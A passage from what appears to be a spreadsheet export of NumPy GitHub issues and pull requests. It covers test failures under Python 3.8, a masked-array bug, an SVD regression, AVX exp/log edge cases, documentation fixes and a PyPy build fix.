weibull    = &lt;built-in method weibull of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
zipf       = &lt;built-in method zipf of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
_x000D_
mtrand.pyx:3800: DeprecationWarning_x000D_
______________________ TestRandomDist.test_hypergeometric _______________________x000D_
_x000D_
self = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7bd8250&gt;_x000D_
_x000D_
    def test_hypergeometric(self):_x000D_
        np.random.seed(self.seed)_x000D_
&gt;       actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))_x000D_
_x000D_
self       = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7bd8250&gt;_x000D_
_x000D_
../../../BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/tests/test_random.py:615: _x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
_x000D_
&gt;   ???_x000D_
E   DeprecationWarning: an integer is required (got type float).  Implicit conversion to integers using __int__ is deprecated, and may be removed in a future version of Python._x000D_
_x000D_
Lock       = &lt;built-in function allocate_lock&gt;_x000D_
RandomState = &lt;class 'mtrand.RandomState'&gt;_x000D_
__builtins__ = &lt;builtins&gt;_x000D_
__doc__    = None_x000D_
__file__   = '/builddir/build/BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/mtrand.cpython-38m-x86_64-linux-gnu.so'_x000D_
__loader__ = &lt;_frozen_importlib_external.ExtensionFileLoader object at 0x7fc7c4486760&gt;_x000D_
__name__   = 'numpy.random.mtrand'_x000D_
__package__ = 'numpy.random'_x000D_
__path__   = None_x000D_
__spec__   = ModuleSpec(name='numpy.random.mtrand', loader=&lt;_frozen_importlib_external.ExtensionFileLoader object at 0x7fc7c4486760...ROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/mtrand.cpython-38m-x86_64-linux-gnu.so')_x000D_
__test__   = {'RandomState.binomial (line 3706)': '\n        binomial(n, p, size=None)\n\n        Draw samples from a binomial dist...0.3])\n        array(['pooh', 'pooh', 'pooh', 'Christopher', 'piglet'],\n              dtype='|S11')\n\n        ", ...}_x000D_
_rand      = &lt;mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
_rand_bool = &lt;built-in function _rand_bool&gt;_x000D_
_rand_int16 = &lt;built-in function _rand_int16&gt;_x000D_
_rand_int32 = &lt;built-in function _rand_int32&gt;_x000D_
_rand_int64 = &lt;built-in function _rand_int64&gt;_x000D_
_rand_int8 = &lt;built-in function _rand_int8&gt;_x000D_
_rand_uint16 = &lt;built-in function _rand_uint16&gt;_x000D_
_rand_uint32 = &lt;built-in function _rand_uint32&gt;_x000D_
_rand_uint64 = &lt;built-in function _rand_uint64&gt;_x000D_
_rand_uint8 = &lt;built-in function _rand_uint8&gt;_x000D_
_randint_type = {dtype('bool'): (0, 2, &lt;built-in function _rand_bool&gt;), dtype('int8'): (-128, 128, &lt;built-in function _rand_int8&gt;), dt...t8'): (0, 256, &lt;built-in function _rand_uint8&gt;), dtype('int16'): (-32768, 32768, &lt;built-in function _rand_int16&gt;), ...}_x000D_
_shape_from_size = &lt;built-in function _shape_from_size&gt;_x000D_
beta       = &lt;built-in method beta of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
binomial   = &lt;built-in method binomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
bytes      = &lt;built-in method bytes of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
chisquare  = &lt;built-in method chisquare of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
choice     = &lt;built-in method choice of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
dirichlet  = &lt;built-in method dirichlet of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
exponential = &lt;built-in method exponential of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
f          = &lt;built-in method f of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
gamma      = &lt;built-in method gamma of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
geometric  = &lt;built-in method geometric of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
get_state  = &lt;built-in method get_state of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
gumbel     = &lt;built-in method gumbel of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
hypergeometric = &lt;built-in method hypergeometric of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
laplace    = &lt;built-in method laplace of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
logistic   = &lt;built-in method logistic of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
lognormal  = &lt;built-in method lognormal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
logseries  = &lt;built-in method logseries of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
multinomial = &lt;built-in method multinomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
multivariate_normal = &lt;built-in method multivariate_normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
negative_binomial = &lt;built-in method negative_binomial of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
noncentral_chisquare = &lt;built-in method noncentral_chisquare of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
noncentral_f = &lt;built-in method noncentral_f of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
normal     = &lt;built-in method normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
np         = &lt;module 'numpy' from '/builddir/build/BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/__init__.py'&gt;_x000D_
operator   = &lt;module 'operator' from '/usr/lib64/python3.8/operator.py'&gt;_x000D_
pareto     = &lt;built-in method pareto of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
permutation = &lt;built-in method permutation of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
poisson    = &lt;built-in method poisson of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
power      = &lt;built-in method power of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
rand       = &lt;built-in method rand of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
randint    = &lt;built-in method randint of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
randn      = &lt;built-in method randn of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
random_integers = &lt;built-in method random_integers of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
random_sample = &lt;built-in method random_sample of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
rayleigh   = &lt;built-in method rayleigh of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
seed       = &lt;built-in method seed of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
set_state  = &lt;built-in method set_state of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
shuffle    = &lt;built-in method shuffle of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_cauchy = &lt;built-in method standard_cauchy of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_exponential = &lt;built-in method standard_exponential of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_gamma = &lt;built-in method standard_gamma of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_normal = &lt;built-in method standard_normal of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
standard_t = &lt;built-in method standard_t of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
triangular = &lt;built-in method triangular of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
uniform    = &lt;built-in method uniform of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
vonmises   = &lt;built-in method vonmises of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
wald       = &lt;built-in method wald of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
warnings   = &lt;module 'warnings' from '/usr/lib64/python3.8/warnings.py'&gt;_x000D_
weibull    = &lt;built-in method weibull of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
zipf       = &lt;built-in method zipf of mtrand.RandomState object at 0x7fc7c4415400&gt;_x000D_
_x000D_
mtrand.pyx:4267: DeprecationWarning_x000D_
_______________ TestRandomDist.test_scalar_exception_propagation ________________x000D_
_x000D_
self = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7a48b20&gt;_x000D_
_x000D_
    def test_scalar_exception_propagation(self):_x000D_
        # Tests that exceptions are correctly propagated in distributions_x000D_
        # when called with objects that throw exceptions when converted to_x000D_
        # scalars._x000D_
        #_x000D_
        # Regression test for gh: 8865_x000D_
    _x000D_
        class ThrowingFloat(np.ndarray):_x000D_
            def __float__(self):_x000D_
                raise TypeError_x000D_
    _x000D_
        throwing_float = np.array(1.0).view(ThrowingFloat)_x000D_
        assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)_x000D_
    _x000D_
        class ThrowingInteger(np.ndarray):_x000D_
            def __int__(self):_x000D_
                raise TypeError_x000D_
    _x000D_
        throwing_int = np.array(1).view(ThrowingInteger)_x000D_
&gt;       assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)_x000D_
_x000D_
ThrowingFloat = &lt;class 'numpy.random.tests.test_random.TestRandomDist.test_scalar_exception_propagation.&lt;locals&gt;.ThrowingFloat'&gt;_x000D_
ThrowingInteger = &lt;class 'numpy.random.tests.test_random.TestRandomDist.test_scalar_exception_propagation.&lt;locals&gt;.ThrowingInteger'&gt;_x000D_
self       = &lt;numpy.random.tests.test_random.TestRandomDist object at 0x7fc7b7a48b20&gt;_x000D_
throwing_float = ThrowingFloat(1.)_x000D_
throwing_int = ThrowingInteger(1)_x000D_
_x000D_
../../../BUILDROOT/numpy-1.16.3-1.fc31.x86_64/usr/lib64/python3.8/site-packages/numpy/random/tests/test_random.py:927: _x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
/usr/lib64/python3.8/unittest/case.py:799: in assertRaises_x000D_
    return context.handle('assertRaises', args, kwargs)_x000D_
/usr/lib64/python3.8/unittest/case.py:214: in handle_x000D_
    callable_obj(*args, **kwargs)_x000D_
/usr/lib64/python3.8/unittest/case.py:236: in __exit___x000D_
    self._raiseFailure("{} not raised by {}".format(exc_name,_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _x000D_
_x000D_
self = &lt;unittest.case._AssertRaisesContext object at 0x7fc7b7a48c70&gt;_x000D_
standardMsg = 'TypeError not raised by hypergeometric'_x000D_
_x000D_
    def _raiseFailure(self, standardMsg):_x000D_
        msg = self.test_case._formatMessage(self.msg, standardMsg)_x000D_
&gt;       raise self.test_case.failureException(msg)_x000D_
E       AssertionError: TypeError not raised by hypergeometric_x000D_
_x000D_
msg        = 'TypeError not raised by hypergeometric'_x000D_
self       = &lt;unittest.case._AssertRaisesContext object at 0x7fc7b7a48c70&gt;_x000D_
standardMsg = 'TypeError not raised by hypergeometric'_x000D_
_x000D_
/usr/lib64/python3.8/unittest/case.py:160: AssertionError_x000D_
= 3 failed, 7418 passed, 84 skipped, 3 deselected, 11 xfailed, 2 xpassed in 387.48 seconds =_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
Numpy 1.16.3_x000D_
_x000D_
Python 3.8.0a3 (default, Apr  3 2019, 16:31:49) _x000D_
[GCC 9.0.1 20190312 (Red Hat 9.0.1-0.10)]_x000D_
_x000D_
_x000D_
&lt;/details&gt;_x000D_
_x000D_
&lt;hr&gt;_x000D_
_x000D_
Summary 2019-04-25 by @seberg_x000D_
_x000D_
 * Python switches behaviour when converting to integer in the C-API (e.g. of floats). This is good news, but means we have to update some tests._x000D_
_x000D_
Actions needed:_x000D_
  * Find tests which need fixing._x000D_
  * Update tests: For python versions newer or equal 3.8 raise DeprecationWarnings and check_x000D_
    that the tests fail._x000D_
  * If the test checks anything else, fix up the test instead and create a new error path test (previous point).</t>
  </si>
  <si>
    <t>Pyth 3.8.0a3 DeprecationWarning: an integer is required (got type float)</t>
  </si>
  <si>
    <t>This issue arose from exploring https://github.com/numpy/numpy/issues/13408. Masked array creation fails when `data` is a `numpy.ndarray` while `mask` is a Python list._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np _x000D_
c = np.ma.array(_x000D_
    np.array([(1, 3, 5), (2, 4, 6)]), _x000D_
    mask=[(True, False, False),  (False, False, False)], _x000D_
    dtype=[('a', '&lt;i4'), ('b', '&lt;i4'), ('c', '&lt;i4')]_x000D_
)_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
MaskError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-174-6b4915bfc205&gt; in &lt;module&gt;_x000D_
      3                 mask=[( True, False, False),_x000D_
      4                       (False, False, False)],_x000D_
----&gt; 5                 dtype=[('a', '&lt;i4'), ('b', '&lt;i4'), ('c', '&lt;i4')])_x000D_
_x000D_
~/.../lib/python3.6/site-packages/numpy/ma/core.py in array(data, dtype, copy, order, mask, fill_value, keep_mask, hard_mask, shrink, subok, ndmin)_x000D_
   6375                        subok=subok, keep_mask=keep_mask,_x000D_
   6376                        hard_mask=hard_mask, fill_value=fill_value,_x000D_
-&gt; 6377                        ndmin=ndmin, shrink=shrink, order=order)_x000D_
   6378 array.__doc__ = masked_array.__doc___x000D_
   6379 _x000D_
_x000D_
~/.../lib/python3.6/site-packages/numpy/ma/core.py in __new__(cls, data, mask, dtype, copy, subok, ndmin, fill_value, keep_mask, hard_mask, shrink, order, **options)_x000D_
   2863                     msg = "Mask and data not compatible: data size is %i, " + \_x000D_
   2864                           "mask size is %i."_x000D_
-&gt; 2865                     raise MaskError(msg % (nd, nm))_x000D_
   2866                 copy = True_x000D_
   2867             # Set the mask to the new value_x000D_
_x000D_
MaskError: Mask and data not compatible: data size is 6, mask size is 2._x000D_
```_x000D_
### Numpy/Python version information:_x000D_
```_x000D_
1.16.2 3.6.1 (default, May 18 2017, 16:32:13) _x000D_
[GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)]_x000D_
```</t>
  </si>
  <si>
    <t>Cannot create a masked array from ndarray data and Python list mask</t>
  </si>
  <si>
    <t>By now, all that is needed is to also allow unicode strings to_x000D_
pass through. Adds a test for the support which already succeeds_x000D_
on python3._x000D_
_x000D_
Closes gh-4053 (replaces the old PR)_x000D_
_x000D_
-----_x000D_
_x000D_
This is to Replace the mentioned PR gh-4053, adds a test, otherwise only relevant for python 2, so probably should backport.</t>
  </si>
  <si>
    <t>BUG: (py2 only) fix unicode support for savetxt fmt string</t>
  </si>
  <si>
    <t>['01 - Enhancement', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Point documentation on default values for array2string, array_str,_x000D_
and array_repr to set_printoptions. set_printoptions uses the same_x000D_
defaulting scheme._x000D_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</si>
  <si>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clarify array_{2string,str,repr} defaults</t>
  </si>
  <si>
    <t>I am now officially working at bids, so institutionally sponsored.</t>
  </si>
  <si>
    <t>DOC: Add Sebastian Berg as sponsored by BIDS</t>
  </si>
  <si>
    <t>Fix typos mistakenly left in #13367</t>
  </si>
  <si>
    <t>DOC: fix typos in dev/index</t>
  </si>
  <si>
    <t>Alternative to gh-13397_x000D_
_x000D_
[before](https://docs.scipy.org/doc/numpy/reference/generated/numpy.genfromtxt.html), [after](https://7079-908607-gh.circle-artifacts.com/0/home/circleci/repo/doc/build/html/reference/generated/numpy.genfromtxt.html)_x000D_
_x000D_
It looks to me like sphinx has some pretty poor formatting rules that format `foo(a, b=(1, 2))` as if both commas were argument separators</t>
  </si>
  <si>
    <t>DOC: Show the default value of deletechars in the signature of genfromtxt</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
It appears that `numpy.linalg.svd` has different outputs between 1.15.4 and 1.16.3 -- and I don't see any hints that this should happen in the changelog._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
If you run numpy==1.15.4 with the following input, you get the following_x000D_
_x000D_
```python_x000D_
In [20]: np.random.seed(0)_x000D_
_x000D_
In [21]: X = np.random.randn(100, 100) * 10_x000D_
_x000D_
In [22]: u, s, v = np.linalg.svd(X)_x000D_
_x000D_
In [23]: s[:5]_x000D_
Out[23]:_x000D_
array([193.6995948 , 183.01489365, 180.94983595, 178.47342134,_x000D_
       174.07146491])_x000D_
_x000D_
In [24]: u[:5, :5]_x000D_
Out[24]:_x000D_
array([[-0.12777193,  0.1473861 , -0.04626332,  0.09269663,  0.12149756],_x000D_
       [-0.23535239,  0.06543527, -0.02588301, -0.05401032, -0.02436388],_x000D_
       [ 0.09956489, -0.07108259, -0.10083294,  0.16710062, -0.0333519 ],_x000D_
       [-0.05718053, -0.11184903, -0.12280465,  0.04707958,  0.16647603],_x000D_
       [ 0.25422798,  0.01464547, -0.15071626, -0.03225463, -0.12620621]])_x000D_
_x000D_
In [25]: np.mean(X - u @ np.diag(s) @ v)_x000D_
Out[25]: 1.336599234069702e-16_x000D_
_x000D_
In [26]: np.std(X - u @ np.diag(s) @ v)_x000D_
Out[26]: 2.0947185697750298e-14_x000D_
```_x000D_
_x000D_
However, if you run svd with numpy==1.16.3, you get the following_x000D_
_x000D_
```python_x000D_
In [13]: np.random.seed(0)_x000D_
_x000D_
In [14]: X = np.random.randn(100, 100) * 10_x000D_
_x000D_
In [15]: u, s, v = np.linalg.svd(X)_x000D_
_x000D_
In [16]: s[:5]_x000D_
Out[16]:_x000D_
array([193.6995948 , 183.01489365, 180.94983595, 178.47342134,_x000D_
       174.07146491])_x000D_
_x000D_
In [17]: u[:5, :5]_x000D_
Out[17]:_x000D_
array([[-0.07680886,  0.17809124, -0.41179481,  0.14073815,  0.14494919],_x000D_
       [ 0.46612298, -0.38573887,  0.34177276, -0.11314353, -0.03170648],_x000D_
       [-0.62584307,  0.10539512,  0.20991414, -0.24513665, -0.11505925],_x000D_
       [-0.43937521, -0.07100245,  0.2941617 , -0.03515797,  0.04093411],_x000D_
       [ 0.00359183, -0.64178218,  0.69484207, -0.09871542,  0.28272959]])_x000D_
_x000D_
In [18]: np.mean(X - u @ np.diag(s) @ v)_x000D_
Out[18]: 1.0356975839816995_x000D_
_x000D_
In [19]: np.std(X - u @ np.diag(s) @ v)_x000D_
Out[19]: 92.84521345330656_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
numpy version 1.15_x000D_
```_x000D_
In [18]: np.__config__.show()_x000D_
mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/include']_x000D_
blas_mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/include']_x000D_
blas_opt_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/include']_x000D_
lapack_mkl_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/include']_x000D_
lapack_opt_info:_x000D_
    libraries = ['mkl_rt', 'pthread']_x000D_
    library_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/lib']_x000D_
    define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]_x000D_
    include_dirs = ['/Users/jmorton/miniconda3/envs/qiime2-2019.1/include']_x000D_
In [27]:  import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.15.4 3.6.5 | packaged by conda-forge | (default, Apr  6 2018, 13:44:09)_x000D_
[GCC 4.2.1 Compatible Apple LLVM 6.1.0 (clang-602.0.53)]_x000D_
```_x000D_
_x000D_
numpy version 1.16_x000D_
```_x000D_
In [3]: np.__config__.show()_x000D_
blas_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
blis_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
blas_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_mkl_info:_x000D_
  NOT AVAILABLE_x000D_
openblas_lapack_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
lapack_opt_info:_x000D_
    libraries = ['openblas', 'openblas']_x000D_
    library_dirs = ['/usr/local/lib']_x000D_
    language = c_x000D_
    define_macros = [('HAVE_CBLAS', None)]_x000D_
_x000D_
In [20]:  import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.16.3 3.6.7 | packaged by conda-forge | (default, Feb 28 2019, 02:16:08)_x000D_
[GCC 4.2.1 Compatible Clang 4.0.1 (tags/RELEASE_401/final)]_x000D_
```_x000D_
_x000D_
As you can see, the output from 1.16.3 is broken, and the svd is no longer a true reconstruction.</t>
  </si>
  <si>
    <t>np.linalg.svd gives weird output</t>
  </si>
  <si>
    <t>Unfortunately I did not comment that on the original MR but there are errors in handling special values of the new float32 avx based exp and log functions._x000D_
_x000D_
executed on an axv2 machine, avx512 still needs to be tested_x000D_
log:_x000D_
_x000D_
```_x000D_
d = np.ones(5, dtype=np.float32) * 1.121_x000D_
_x000D_
# wrong result_x000D_
d[...] = np.nan_x000D_
print(np.log(d))_x000D_
[89.1283 89.1283 89.1283 89.1283 89.1283]_x000D_
_x000D_
# correct but raises divide by zero error, which glibc scalar function does not_x000D_
d[...] = 0._x000D_
print(np.log(d))_x000D_
_x000D_
# raises invalid value error_x000D_
d[...] = -2. _x000D_
print(np.log(d))_x000D_
d[...] = -np.inf_x000D_
print(np.log(d))_x000D_
```_x000D_
_x000D_
exp _x000D_
```_x000D_
# raises invalid value instead of overflow_x000D_
d[...] = 1e17_x000D_
print(np.exp(d))_x000D_
_x000D_
#raises invalid value_x000D_
d[...] = np.nan_x000D_
print(np.exp(d))_x000D_
d[...] = np.inf_x000D_
print(np.exp(d))_x000D_
d[...] = -np.inf_x000D_
print(np.exp(d))_x000D_
```</t>
  </si>
  <si>
    <t>invalid special value handling of avx exp</t>
  </si>
  <si>
    <t>Prior to this commit_x000D_
_x000D_
    np.array([array_like])_x000D_
_x000D_
would recursively copy each element of `array_like`. This is due to the fact that_x000D_
`setArrayFromSequence` only special-cased lists of NumPy arrays, any other_x000D_
object was treated as a sequence even if it supported buffer or `__array*__`_x000D_
interfaces. See tensorflow/tensorflow#27692 for details._x000D_
_x000D_
The commit generalizes the special-case in `setArrayFromSequence` to any_x000D_
array-like, i.e. a buffer or an object with `__array__`, `__array_interface__`_x000D_
`__array_struct__`.</t>
  </si>
  <si>
    <t>ENH: Improved performance of PyArray_FromAny for sequences of array-like</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
Fix #13088 by updating the docstring of `np.genfromtxt` [here](https://github.com/numpy/numpy/blob/master/numpy/lib/npyio.py)_x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: Resolve confusion regarding hashtag in header line of csv</t>
  </si>
  <si>
    <t>Backport of #13334_x000D_
_x000D_
Done as three commits deliberate, so that [the base commit](https://github.com/numpy/numpy/pull/13396/commits/b5895be146cdc3063ffa9ca8ae27b5bcf7992719) can be shared between both branches</t>
  </si>
  <si>
    <t>BUG: Fix structured_to_unstructured on single-field types (backport)</t>
  </si>
  <si>
    <t>['08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t>I just got bitten by the difference of the default values for `rtol` and `atol` in `allclose` and `assert_allclose` today, again, not the first time. So I thought I add a little note._x000D_
_x000D_
I assume in `allclose` no notion of `assert_allclose` is desired, what makes sense. However, mention it in the docs of `assert_allclose`  explicitly might make it a tad easier to be found._x000D_
_x000D_
There are various discussions about this, e.g., the discussions in issues #3183, #7726, #10161, or http://numpy-discussion.10968.n7.nabble.com/allclose-vs-assert-allclose-td38018.html._x000D_
_x000D_
**This PR is not going into the pros and cons etc, it just adds a little clarification to the docstring of `assert_allclose`.**</t>
  </si>
  <si>
    <t>DOC: note re defaults allclose to assert_allclose</t>
  </si>
  <si>
    <t xml:space="preserve">See https://docs.python.org/2/library/unittest.html#deprecated-aliases_x000D_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</si>
  <si>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DEP: Fix deprecated ``assertEquals()``</t>
  </si>
  <si>
    <t>['03 - Maintenance', '07 - Deprecation', 'component: swig']</t>
  </si>
  <si>
    <t xml:space="preserve">Define `PyStructSequence_InitType2` for those PyPy versions that_x000D_
don't support it._x000D_
_x000D_
Closes gh-13384._x000D_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</si>
  <si>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Some PyPy versions lack PyStructSequence_InitType2.</t>
  </si>
  <si>
    <t>With true division available, using `.0` to convert integers to floats offers no value, and harms compatibility with precise rational types.</t>
  </si>
  <si>
    <t>ENH: Add support for Fraction to percentile and quantile</t>
  </si>
  <si>
    <t>To clarify the implications of  https://github.com/numpy/numpy/pull/13305</t>
  </si>
  <si>
    <t>ENH: implement ``__skip_array_function__`` attribute for NEP-18</t>
  </si>
  <si>
    <t>['01 - Enhancement', '58 - Ready for review', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Currently, `numpy.random.multivariate_normal` makes use of SVD decomposition, `numpy.dual.svd`, on the provided covariance matrix to perform the sampling. This approach allows the use of positive semi-definite covariance matrix. However, it is not unique as the singular vectors are not guaranteed to be. In fact,_x000D_
_x000D_
```_x000D_
[[-1, 0],_x000D_
 [0,  -1]]_x000D_
 ```_x000D_
_x000D_
and _x000D_
_x000D_
```_x000D_
[[1, 0],_x000D_
 [0,  1]]_x000D_
 ```_x000D_
_x000D_
can be the singular-vectors of a 2-by-2 identity matrix._x000D_
_x000D_
A Cholesky decomposition instead would result in an unique decomposition with the down side of only working on positive definite matrices. We could use instead a Cholesky decomposition with complete pivoting: http://www.netlib.org/lapack/explore-html/da/dba/group__double_o_t_h_e_rcomputational_ga31cdc13a7f4ad687f4aefebff870e1cc.html_x000D_
It provides both advantages: works on positive semi-definite matrices and are unique (as far as I know)._x000D_
_x000D_
Any thoughts?_x000D_
_x000D_
Related issue: https://github.com/numpy/numpy/issues/13358</t>
  </si>
  <si>
    <t>Deterministic (up to numerical error) multivariate_normal sampling</t>
  </si>
  <si>
    <t>Building numpy-1.16.3 from source for pypy3.6-v7.1.1-win32 or pypy3.5-v7.0.0-win32 using Visual Studio 2015/2017 fails with a link error:_x000D_
```_x000D_
typeinfo.obj : error LNK2019: unresolved external symbol _PyStructSequence_InitType2 referenced in function _typeinfo_init_structsequences_x000D_
build\lib.win32-3.6\numpy\core\_multiarray_umath.pypy3-71-win32.pyd : fatal error LNK1120: 1 unresolved externals_x000D_
```_x000D_
_x000D_
Probably related to https://github.com/numpy/numpy/pull/13346_x000D_
_x000D_
This fix works for me:_x000D_
```diff_x000D_
diff --git a/numpy/core/src/multiarray/typeinfo.c b/numpy/core/src/multiarray/typeinfo.c_x000D_
index bc4147841..aa4dd055e 100644_x000D_
--- a/numpy/core/src/multiarray/typeinfo.c_x000D_
+++ b/numpy/core/src/multiarray/typeinfo.c_x000D_
@@ -105,7 +105,7 @@ PyArray_typeinforanged(_x000D_
 }_x000D_
_x000D_
 /* Backport, only needed here */_x000D_
-#if PY_VERSION_HEX &lt; 0x03040000_x000D_
+#if (PY_VERSION_HEX &lt; 0x03040000) || defined(PYPY_VERSION)_x000D_
     static int_x000D_
